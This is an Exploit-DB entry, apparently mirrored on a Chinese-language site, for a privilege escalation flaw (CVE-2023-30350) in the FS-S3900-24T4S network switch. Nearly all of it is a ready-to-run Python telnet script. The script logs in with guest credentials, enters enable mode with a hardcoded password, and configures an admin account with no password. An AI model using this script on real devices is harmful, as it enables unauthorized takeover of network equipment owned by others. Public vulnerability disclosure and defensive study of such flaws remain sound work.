FS-S3900-24T4S – Privilege Escalation

  • 作者: Daniele Linguaglossa
    日期: 2023-05-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51414/
  • # Exploit Title: FS-S3900-24T4S Privilege Escalation
    # Date: 29/04/2023
    # Exploit Author: Daniele Linguaglossa & Alberto Bruscino
    # Vendor Homepage: https://www.fs.com/
    # Software Link: not available
    # Version: latest
    # Tested on: latest
    # CVE : CVE-2023-30350
    
    import sys
    import telnetlib
    
    
    def exploit(args):
    print(args)
    if len(args) != 1:
    print(f"Usage: {sys.argv[0]} <ip>")
    sys.exit(1)
    else:
    ip = args[0]
    try:
    with telnetlib.Telnet(ip, 23) as tn:
    try:
    tn.read_until(b"Username: ")
    tn.write(b"guest\r\n")
    tn.read_until(b"Password: ")
    tn.write(b"guest\r\n")
    tn.read_until(b">")
    tn.write(b"enable\r\n")
    tn.read_until(b"Password: ")
    tn.write(b"super\r\n")
    tn.read_until(b"#")
    tn.write(b"configure terminal\r\n")
    tn.read_until(b"(config)#")
    tn.write(b"username admin nopassword\r\n")
    tn.read_until(b"(config)#")
    print(
    "Exploit success, you can now login with username: admin and password: <empty>")
    tn.close()
    except KeyboardInterrupt:
    print("Exploit failed")
    tn.close()
    except ConnectionRefusedError:
    print("Connection refused")
    
    
    if __name__ == "__main__":
    exploit(sys.argv[1:])